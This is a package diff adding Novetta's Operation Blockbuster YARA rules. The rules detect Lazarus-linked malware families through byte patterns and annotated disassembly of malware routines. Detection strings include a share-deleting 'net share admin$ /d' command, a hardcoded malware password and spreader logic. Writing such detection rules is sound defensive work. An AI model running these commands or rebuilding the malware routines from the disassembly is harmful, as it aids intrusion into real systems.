+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "5d21e865d57e9798ac7c14a6ad09c4034d103f3ea993295dcdf8a208ea825ad7"
+
+	strings:
+	/*
+		FF 15 D8 5B 00 10  call    GetTickCount_9
+		0F B7 C0           movzx   eax, ax
+		8B C8              mov     ecx, eax
+		// skipped: 6A 01              push    1               ; fDecode
+		C1 E9 34           shr     ecx, 34h         <--- this value could change
+		81 F1 C0 F3 00 00  xor     ecx, 0F3C0h			<--- this value could change
+		// skipped: 6A 04              push    4               ; dwLength
+		C1 E0 10           shl     eax, 10h
+		0B C8              or      ecx, eax
+	*/
+
+	$a = {	FF 15 [4]  0F B7 C0 8B C8 [2-4] C1 E9 ?? 81 F1 [2] 00 00 [0-2] 	C1 E0 10 0B C8 	}
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/sharedcode.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/sharedcode.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/sharedcode.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/sharedcode.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,312 @@
+// sigs for the various cross-family codes
+import "pe"
+
+rule Caracachs: sharedcode
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_"
+
+	strings:
+	/*
+		B9 10 00 00 00     mov     ecx, 10h        ; ecx = 16
+		8B 06              mov     eax, [esi]      ; eax = lastValue
+		C1 EA 10           shr     edx, 10h        ; edx = val >> 16
+		81 E2 FF 7F 00 00  and     edx, 7FFFh      ; edx = (val >> 16) & 0x7FFF
+		03 C2              add     eax, edx        ; eax = ((val >> 16) & 0x7FFF) + lastValue
+		8B D0              mov     edx, eax        ; edx = ((val >> 16) & 0x7FFF) + lastValue
+		8B F8              mov     edi, eax        ; edi = ((val >> 16) & 0x7FFF) + lastValue
+		83 E2 0F           and     edx, 0Fh        ; edx = (((val >> 16) & 0x7FFF) + lastValue) & 0xF
+		2B CA              sub     ecx, edx        ; ecx = 16 - ((((val >> 16) & 0x7FFF) + lastValue)) & 0xF
+		D3 EF              shr     edi, cl         ; edi = (((val >> 16) & 0x7FFF) + lastValue) >> ((16 - ((val >> 16) & 0x7FFF) + lastValue) & 0xF)
+		8B CA              mov     ecx, edx        ; ecx = (((val >> 16) & 0x7FFF) + lastValue) & 0xF
+		D3 E0              shl     eax, cl         ; eax = (((val >> 16) & 0x7FFF) + lastValue) << ((((val >> 16) & 0x7FFF) + lastValue) & 0xF)
+		0B F8              or      edi, eax        ; edi = (((val >> 16) & 0x7FFF) + lastValue) >> ((16 - ((val >> 16) & 0x7FFF) + lastValue) & 0xF) | (((val >> 16) & 0x7FFF) + lastValue) << ((((val >> 16) & 0x7FFF) + lastValue) & 0xF)
+		89 3E              mov     [esi], edi      ; pLastValue = (((val >> 16) & 0x7FFF) + lastValue) >> ((16 - ((val >> 16) & 0x7FFF) + lastValue) & 0xF) | (((val >> 16) & 0x7FFF) + lastValue) << ((((val >> 16) & 0x7FFF) + lastValue) & 0xF)
+	*/
+
+	$a = {B? 10 00 00 00 8B ?? C1 ?? 10 81 ?? FF 7F 00 00 03 ?? 8B ?? 8B ?? 83 ?? 0F 2B ?? D3 ?? 8B ?? D3 ?? 0B ?? 	89 ?? 	}
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
+
+
+rule StringDotSimplified: sharedcode
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_"
+
+	strings:
+	/*
+		F3 AB     rep stosd
+		80 3A 00  cmp     byte ptr [edx], 0
+		74 15     jz      short loc_404170
+		8A 02     mov     al, [edx]
+		3C 2E     cmp     al, 2Eh
+		74 07     jz      short loc_404168
+		3C 20     cmp     al, 20h
+		74 03     jz      short loc_404168
+		88 06     mov     [esi], al
+		46        inc     esi
+	*/
+
+	$a = {	F3 AB 	80 ?? 00 	74 ?? 	8A 02 	3C 2E 	74 ?? 	3C 20 	74 ?? 	88 06 	46 }
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
+
+rule FakeTLS_ServerHelloGetSelectedCipher: sharedcode
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_"
+
+	strings:
+	/*
+		24 10           and     al, 10h
+		0C 10           or      al, 10h
+		89 07           mov     [edi], eax
+		66 8B 44 24 14  mov     ax, [esp+0Ch+wCipherSuiteID]
+		66 3D 00 C0     cmp     ax, 0C000h
+		73 34           jnb     short loc_4067C1
+		66 2D 35 00     sub     ax, 35h
+		66 F7 D8        neg     ax
+		1B C0           sbb     eax, eax
+		24 80           and     al, 80h
+		05 00 01 00 00  add     eax, 100h
+		8B D8           mov     ebx, eax
+		53              push    ebx             ; hostshort
+	*/
+
+	$a = {	24 10 	0C 10 	89 ?? 	66 8? [3] 66 3? 00 C0 73 ?? 66 2? 35 00 66 F7 ?? 1B ?? 	2? 80 0? 00 01 00 00 8B ?? 5? }
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
+
+rule XORDecodeA7: sharedcode
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_"
+
+	strings:
+	/*
+		8A 04 17  mov     al, [edi+edx]
+		8B FB     mov     edi, ebx
+		34 A7     xor     al, 0A7h
+		46        inc     esi
+		88 02     mov     [edx], al
+		83 C9 FF  or      ecx, 0FFFFFFFFh
+		33 C0     xor     eax, eax
+		42        inc     edx
+		F2 AE     repne scasb
+		F7 D1     not     ecx
+		49        dec     ecx
+		3B F1     cmp     esi, ecx
+	*/
+
+	$a = {	8A [2] 	8B ??	34 A7 	46 88 ?? 83 ?? FF 33 ?? 4? F2 AE F7 ?? 	4? 3B ?? }
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
+
+
+rule DynamicAPILoading: sharedcode
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_"
+
+	strings:
+	/*
+		83 C4 04           add     esp, 4
+		50                 push    eax             ; lpProcName
+		56                 push    esi             ; hModule
+		FF 15 20 F0 40 00  call    ds:GetProcAddress
+		68 A8 0C 41 00     push    offset aLo_adlIbr_arYw; "Lo.adL ibr.ar yW"
+		A3 DC 3E 41 00     mov     GetProcAddress_0, eax
+		E8 7D FF FF FF     call    CleanupString
+		83 C4 04           add     esp, 4
+		50                 push    eax             ; _DWORD
+		56                 push    esi             ; _DWORD
+		FF 15 DC 3E 41 00  call    GetProcAddress_0
+		68 94 0C 41 00     push    offset aLoad_LibR_arYa; "Load. Lib r.ar yA"
+		A3 D4 3E 41 00     mov     LoadLibraryW, eax
+		E8 63 FF FF FF     call    CleanupString
+		83 C4 04           add     esp, 4
+		50                 push    eax             ; _DWORD
+		56                 push    esi             ; _DWORD
+		FF 15 DC 3E 41 00  call    GetProcAddress_0
+		68 80 0C 41 00     push    offset a_frE_eliBr_arY; ".Fr e.eLi br.ar y"
+		A3 D8 3E 41 00     mov     LoadLibraryA_0, eax
+		E8 49 FF FF FF     call    CleanupString
+	*/
+
+	$a = {	83 C4 ?? 5? 5? 	FF 15 [4] 68 [4] A3 [4]	E8 [4]	83 C4 ?? 5? 5? 	FF 15 [4] 68 [4] A3 [4]	E8 [4] 83 C4 ?? 5?  5? 	FF 15 [4] 68 [4] A3 [4]	E8}
+
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
+
+
+rule DNSCalcStyleEncodeAndDecode: sharedcode
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "975522bc3e07f7aa2c4a5457e6cc16c49a148b9f731134b8971983225835577e"
+
+	strings:
+	/*
+		8A 10     mov     dl, [eax]
+		80 F2 73  xor     dl, 73h					<--- for decoding and encoding, this and
+		80 EA 3A  sub     dl, 3Ah					<--- this could be reversed, but the sig holds since both are 0x80
+		88 10     mov     [eax], dl
+		40        inc     eax
+		49        dec     ecx
+		75 F2     jnz     short loc_1000403C
+	*/
+
+	$a = {8A ?? 80 ?? ?? 80 ?? ?? 88 ?? 4? 4? 75 ?? }
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
+
+rule GenerateTLSClientHelloPacket_Test: sharedcode
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_"
+
+	strings:
+	/*
+		25 07 00 00 80  and     eax, 80000007h
+		79 05           jns     short loc_405EC8; um, nope.. this will always happen
+		48              dec     eax
+		83 C8 F8        or      eax, 0FFFFFFF8h
+		40              inc     eax
+	*/
+
+	$a = {25 07 00 00 80 79 ?? 4? 	83 ?? F8 4? }
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
+
+rule RC4SboxKeyGen: sharedcode
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "RT_RCDATA_101.bin.bin"
+
+	strings:
+	/*
+		8A 4C 04 08        mov     cl, [esp+eax+108h+sbox]; cl = sbox[i]
+		8B D0              mov     edx, eax
+		81 E2 0F 00 00 80  and     edx, 8000000Fh  ; i % 16
+		79 05              jns     short loc_10003AC8; dl = key[i & 16]
+		4A                 dec     edx
+		83 CA F0           or      edx, 0FFFFFFF0h
+		42                 inc     edx
+	*/
+
+	$a = {	8A [3] 	8B ?? 	81 ?? 0F 00 00 80 79 ?? 4? 83 ?? F0 4? 	}
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
+
+
+rule RandomTimestampGenerator: sharedcode
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "RT_RCDATA_101.bin.bin joanap baseline sample"
+
+	strings:
+	/*
+		66 81 44 24 0C FE FF  add     [esp+1Ch+SystemTime.wYear], 0FFFEh
+		FF D6                 call    esi ; rand
+		99                    cdq
+		B9 0C 00 00 00        mov     ecx, 0Ch
+		F7 F9                 idiv    ecx
+		42                    inc     edx
+		66 89 54 24 0E        mov     [esp+1Ch+SystemTime.wMonth], dx
+		FF D6                 call    esi ; rand
+		99                    cdq
+		B9 1C 00 00 00        mov     ecx, 1Ch
+		F7 F9                 idiv    ecx
+		42                    inc     edx
+		66 89 54 24 12        mov     [esp+1Ch+SystemTime.wDay], dx
+		FF D6                 call    esi ; rand
+		99                    cdq
+		B9 17 00 00 00        mov     ecx, 17h
+		F7 F9                 idiv    ecx
+		42                    inc     edx
+		66 89 54 24 14        mov     [esp+1Ch+SystemTime.wHour], dx
+		FF D6                 call    esi ; rand
+		99                    cdq
+		B9 3B 00 00 00        mov     ecx, 3Bh
+		F7 F9                 idiv    ecx
+		42                    inc     edx
+		66 89 54 24 16        mov     [esp+1Ch+SystemTime.wMinute], dx
+		FF D6                 call    esi ; rand
+		99                    cdq
+		B9 3B 00 00 00        mov     ecx, 3Bh
+		F7 F9                 idiv    ecx
+	*/
+
+	$a = {	66 81 [3] FE FF FF [1-4] 99 B9 0C 00 00 00 F7 [1-4] 42 	66 89 [3]  FF D6 99 B9 1C 00 00 00 F7 [1-4] 42 	66 89 [3] FF D6 99 B9 17 00 00 00 F7 [1-4] 42 66 89 [3] FF D6 99 B9 3B 00 00 00 F7 [1-4] 42 66 89 [3] FF D6 99 	B9 3B 00 00 00 	F7 }
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
+
+rule CPUInfoExtraction
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "Cmd10010_296fcc9d611ca1b8f8288192d6d854cf4072853010cc65cb0c7f958626999fbd.bin"
+
+	strings:
+	/*
+		68 00 00 00 80     push    80000000h       ; a2
+		8B 02              mov     eax, [edx]
+		8B 4A 04           mov     ecx, [edx+4]
+		89 4C 24 10        mov     [esp+2Ch+var_1C], ecx
+		8B 4A 08           mov     ecx, [edx+8]
+		89 4C 24 14        mov     [esp+2Ch+var_18], ecx
+		8B 4A 0C           mov     ecx, [edx+0Ch]
+		8D 54 24 1C        lea     edx, [esp+2Ch+var_10]
+		89 8E 70 03 00 00  mov     [esi+370h], ecx
+		52                 push    edx             ; a1
+		8B CE              mov     ecx, esi
+		89 86 6C 03 00 00  mov     [esi+36Ch], eax
+		E8 29 FF FF FF     call    GetCPUIDValues
+		8B C8              mov     ecx, eax
+		8B 01              mov     eax, [ecx]
+		3D 00 00 00 80     cmp     eax, 80000000h
+		8B 51 04           mov     edx, [ecx+4]
+	*/
+
+	$a = {68 00 00 00 80 8B ?? 8B ?? 04 89 [3] 8B ?? 08 89 [3] 8B ?? 0C 8D [3] 89 [5] 5? 8B ?? 89 [5] E8 [4] 8B ?? 8B ?? 	3D 00 00 00 80 8B ?? 04 }
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/SierraAlfa.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/SierraAlfa.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/SierraAlfa.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/SierraAlfa.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,72 @@
+import "pe"
+
+rule SierraAlfa
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "4d4b17ddbcf4ce397f76cf0a2e230c9d513b23065f746a5ee2de74f447be39b9.ex_"
+
+	strings:
+	/*
+		8D 54 24 08              lea     edx, [esp+128h+argp]
+		52                       push    edx             ; argp
+		68 7E 66 04 80           push    8004667Eh       ; cmd
+		56                       push    esi             ; s
+		E8 DB 51 00 00           call    ioctlsocket
+		8D 44 24 14              lea     eax, [esp+128h+name]
+		6A 10                    push    10h             ; namelen
+		50                       push    eax             ; name
+		56                       push    esi             ; s
+		E8 C8 51 00 00           call    connect
+		8B 8C 24 34 01 00 00     mov     ecx, [esp+128h+dwTimeout]
+		8D 54 24 0C              lea     edx, [esp+128h+timeout]
+		52                       push    edx             ; timeout
+		8D 44 24 28              lea     eax, [esp+12Ch+writefds]
+		6A 00                    push    0               ; exceptfds
+		50                       push    eax             ; writefds
+		6A 00                    push    0               ; readfds
+		6A 00                    push    0               ; nfds
+		89 74 24 3C              mov     [esp+13Ch+writefds.fd_array], esi
+		89 7C 24 38              mov     [esp+13Ch+writefds.fd_count], edi
+		89 4C 24 20              mov     [esp+13Ch+timeout.tv_sec], ecx
+		C7 44 24 24 00 00 00 00  mov     [esp+13Ch+timeout.tv_usec], 0
+		E8 92 51 00 00           call    select
+		33 C9                    xor     ecx, ecx
+		56                       push    esi             ; s
+		85 C0                    test    eax, eax
+		0F 9F C1                 setnle  cl
+		8B F9                    mov     edi, ecx
+		E8 7D 51 00 00           call    closesocket
+	*/
+
+	$connectTest = {8D [3] 5? 68 7E 66 04 80 5? E8 [4] 8D [3] 6A 10 5? 5? E8 [4] 8B [6] 8D [3] 5? 8D [3] 6A 00 5? 6A 00 6A 00 89 [3] 89 [3] 89 [3] C7 [7] E8 [4] 33 ?? 5? 85 C0 0F 9F ?? 8B ?? E8}
+
+	/*
+		E8 D8 62 00 00                                call    rand
+		8B F8                                         mov     edi, eax
+		E8 D1 62 00 00                                call    rand
+		0F AF F8                                      imul    edi, eax
+		E8 C9 62 00 00                                call    rand
+		0F AF C7                                      imul    eax, edi
+		99                                            cdq
+		33 C2                                         xor     eax, edx
+		2B C2                                         sub     eax, edx
+		33 D2                                         xor     edx, edx
+		F7 F6                                         div     esi
+		8B FA                                         mov     edi, edx
+		57                                            push    edi
+		E8 05 13 00 00                                call    sub_402BD0
+	*/
+	 	$maths = { E8 [4] 8B ?? E8 [4] 0F AF ?? E8 [4] 0F AF ?? 99 33 ?? 2B ?? 33 ?? F7 ?? 8B ?? 5? E8}
+		
+		$s1 = "recdiscm32.exe"
+		$s2 = "\\\\%s\\shared$\\syswow64"
+		$s3 = "\\\\%s\\shared$\\system32"
+
+	condition:
+		$connectTest in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+		or $maths in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+		or 3 of ($s*)
+
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/SierraBravo.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/SierraBravo.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/SierraBravo.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/SierraBravo.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,95 @@
+// Brambul related signatures
+
+import "pe"
+
+rule SierraBravo_Two
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+		/*
+		.text:00403D5A                 mov     word ptr [esi+0Eh], 0C807h
+		.text:00403D60                 mov     dword ptr [esi+39h], 800000D4h
+		.text:00403D67                 mov     byte ptr [edi], 0Ch							<---- ignored
+		.text:00403D6A                 mov     word ptr [esi+25h], 0FFh
+		.text:00403D70                 mov     word ptr [esi+27h], 0A4h
+		.text:00403D76                 mov     word ptr [esi+29h], 4104h
+		.text:00403D7C                 mov     word ptr [esi+2Bh], 32h
+		
+		or
+		
+		.text:100036F9                 mov     word ptr [ebx+0Eh], 0C807h
+														---- begin ignored -----
+		.text:100036FF                 rep movsd
+		.text:10003701                 lea     edi, [ebx+60h]
+		.text:10003704                 mov     ecx, 9
+		.text:10003709                 mov     esi, offset aWindows2000219 ; "windows 2000 2195"
+														---- end ignored -----
+		.text:1000370E                 mov     dword ptr [ebx+39h], 800000D4h
+		.text:10003715                 mov     word ptr [ebx+25h], 0FFh
+		.text:1000371B                 mov     word ptr [ebx+27h], 0A4h
+		.text:10003721                 mov     word ptr [ebx+29h], 4104h
+		.text:10003727                 mov     word ptr [ebx+2Bh], 32h
+		*/
+		$smbComNegotiationPacketGen = { 66 C7 ?? 0E 07 C8 [0-32] C7 ?? 39 D4 00 00 80 [0-32] 66 C7 ?? 25 FF 00 [0-32] 66 C7 ?? 27 A4 00 [0-32]	66 C7 ?? 29 04 41 [0-32] 66 C7 ?? 2B 32 00}
+
+		$lib = "!emCFgv7Xc8ItaVGN0bMf"
+		$api1 = "!ctRHFEX5m9JnZdDfpK"
+		$api2 = "!emCFgv7Xc8ItaVGN0bMf"
+		$api3 = "!VWBeBxYx1nzrCkBLGQO"		
+		$pwd = "iamsorry!@1234567"										
+
+		
+	condition:
+		$smbComNegotiationPacketGen in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+		or ($pwd in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size))
+		 		and 
+		 		($lib in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size))
+				or $api1 in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size))
+				or $api2 in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size))
+				or $api3 in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size))
+		))
+
+}
+
+
+rule SierraBravo_One
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+		/*
+			.text:00402A65                 push    8004667Eh       ; cmd
+			.text:00402A6A                 push    esi             ; s
+			.text:00402A6B                 call    ioctlsocket
+			.text:00402A70                 push    32h             ; dwMilliseconds
+			.text:00402A72                 mov     [esp+24Ch+writefds.fd_array], esi
+			.text:00402A79                 mov     [esp+24Ch+writefds.fd_count], 1
+			.text:00402A84                 mov     [esp+24Ch+timeout.tv_sec], 3
+			.text:00402A8C                 mov     [esp+24Ch+timeout.tv_usec], 0			
+		*/
+		$spreaderSetup = {68 7E 66 04 80 5? E8 [4] 6A 32 89 B4 [5] C7 84 [5] 01 00 00 00 C7 44 [2] 03 00 00 00 C7 44 [2] 00 00 00 00 }
+
+	condition:
+		$spreaderSetup in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
+
+rule SierraBravo_packed
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+		$ = "cmd.exe /c \"net share admin$ /d\""
+		$ = "MAIL FROM:<"
+		$ = ".petite"
+		$ = "Subject: %s|%s|%s"
+	condition:
+		3 of them
+	
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/SierraCharlie.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/SierraCharlie.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/SierraCharlie.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/SierraCharlie.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,31 @@
+import "pe"
+
+rule SierraCharlie
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "f4750e1d82b08318bdc1eb6d3399dee52750250f7959a5e4f83245449f399698.bin"
+
+	strings:
+	/*
+		8B 0D 50 A7 56 00  mov     ecx, DnsFree
+		81 F6 8C 3F 7C 5E  xor     esi, 5E7C3F8Ch
+		6A 01              push    1               ; _DWORD
+		50                 push    eax             ; _DWORD
+		85 C9              test    ecx, ecx
+		74 3A              jz      short loc_40580B
+		FF D1              call    ecx ; DnsFree
+	*/
+
+	$dnsResolve = {	8B 0D 50 A7 56 00 81 F6 8C 3F 7C 5E 6A 01 50 85 C9 74 3A FF D1 	}
+		
+	$file1 = "wmplog21t.sqm"
+	$file2 = "wmplog15r.sqm"
+	$file3 = "wmplog09c.sqm"
+		
+
+	condition:
+		$dnsResolve in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+		or 2 of ($file*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/SierraJuliettMikeOne.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/SierraJuliettMikeOne.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/SierraJuliettMikeOne.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/SierraJuliettMikeOne.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,34 @@
+import "pe"
+
+rule SierraJuliettMikeOne
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+		$commKey = { 10 20 30 40 50 60 70 80 90 11 12 13 1A FF EE 48 }
+		/*
+		.text:10001850                 push    7530h           ; dwTimeout
+		.text:10001855                 lea     eax, [esp+420h+a2]
+		.text:10001859                 push    4               ; len
+		.text:1000185B                 push    eax             ; a2
+		.text:1000185C                 push    esi             ; s
+		.text:1000185D                 mov     dword ptr [esp+42Ch+a2], 1000h
+		.text:10001865                 call    CommSendWithTimeout
+		.text:1000186A                 add     esp, 14h
+		.text:1000186D                 cmp     eax, 0FFFFFFFFh
+		.text:10001870                 jz      loc_10001915
+		.text:10001876                 lea     ecx, [esp+418h+random]
+		.text:1000187A                 push    ecx             ; a1
+		.text:1000187B                 call    Generate16ByteRandomBuffer
+		.text:10001880                 push    0               ; fEncrypt
+		.text:10001882                 push    7530h           ; dwTimeout		
+		*/
+		$handshake = { 68 30 75 00 00 [4] 6A 04 5? 5? C? [3] 00 10 00 00 E8 [7] 83 F8 FF 0F 84 ?? ?? 00 00 8? [3] 5? E8 [4] 6A 00 68 30 75 00 00 }
+		
+	condition:
+		$commKey in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size))
+		and $handshake in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+
+}
\ No newline at end of file
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/SierraJuliettMikeTwo.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/SierraJuliettMikeTwo.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/SierraJuliettMikeTwo.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/SierraJuliettMikeTwo.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,73 @@
+import "pe"
+
+
+rule RomeoJuliettMikeTwo
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "819722ba1c5b9d0b360c54cbdd3811d0cac1a9230720b3ed4815f78bcacb3653_d1ba9ba2987f59d99ce4bf09393c0521c4d1f2961c5aeed4e0bf86e78303d27c"
+
+	strings:
+	/*
+		81 7C 24 24 33 27 00 00  cmp     [esp+1Ch+dwBytesToRead], 2733h
+		75 7F                    jnz     short loc_10002B74
+		8D 54 24 14              lea     edx, [esp+1Ch+var_8]
+		52                       push    edx             ; Time
+		FF 15 5C 11 02 10        call    ds:time
+		8B 44 24 14              mov     eax, [esp+20h+var_C]
+		83 C4 04                 add     esp, 4
+		8B C8                    mov     ecx, eax
+		40                       inc     eax
+		83 F9 64                 cmp     ecx, 64h
+	*/
+
+	$recvFunc = { 81 [3] 33 27 00 00 75 ?? 8D [3] 5? FF 15 [4] 8B [3] 83 ?? 04 8B ?? 4? 83 ?? 64 }
+
+	/*
+		E8 74 31 00 00     call    GetStringByIndex
+		8B 7C 24 14        mov     edi, [esp+0Ch+dwFuncIndex]
+		8B F0              mov     esi, eax
+		57                 push    edi             ; index
+		E8 68 31 00 00     call    GetStringByIndex
+		83 C4 08           add     esp, 8
+		85 F6              test    esi, esi
+		74 21              jz      short loc_10001040
+		85 C0              test    eax, eax
+		74 1D              jz      short loc_10001040
+		56                 push    esi             ; lpLibFileName
+		FF 15 2C 10 02 10  call    ds:LoadLibraryA
+		57                 push    edi             ; index
+		8B F0              mov     esi, eax
+		E8 4E 31 00 00     call    GetStringByIndex
+		83 C4 04           add     esp, 4
+		50                 push    eax             ; lpProcName
+		56                 push    esi             ; hModule
+		FF 15 5C 10 02 10  call    ds:GetProcAddress
